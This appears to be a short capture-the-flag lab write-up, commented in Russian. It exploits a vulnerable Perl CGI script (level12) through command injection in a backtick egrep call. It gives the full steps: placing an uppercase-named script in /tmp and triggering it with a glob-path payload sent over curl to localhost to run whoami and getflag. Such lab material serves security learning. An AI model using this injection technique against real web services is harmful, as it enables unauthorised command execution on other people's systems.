1) ls 
level12.pl
2) cat level12.pl

#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}


Видим что работает все на порту 4646
И в функциях используются 2 параметра. Нас интересует строка с egrep, т.к там ищется бинарник в папке /tmp
Попробуем запустиьт whoami через первый аргумент. Также стоит учесть
Принимаем во внимание следующее:
	a) Название будет в Upper Case
		$xx =~ tr/a-z/A-Z/;
	б) Должно начинатся с пробельных символов, за которым следует не пробельный символ
		$xx =~ s/\s.*//;

3) echo "whoami > /tmp/text" > /tmp/WHOAMI
4) chmod 777 /tmp/WHOAMI
5) ./level12.pl x="`/*/WHOAMI`"
6) cat /tmp/text
level12
7) curl '127.0.0.1:4646?x="`/*/WHOAMI`"'
cat /tmp/text
flag12
8) echo "getflag > /tmp/token" > /tmp/GETFLAG && chmod 777 /tmp/GETFLAG
9) curl '127.0.0.1:4646?x="`/*/GETFLAG`"'
10) cat /tmp/token
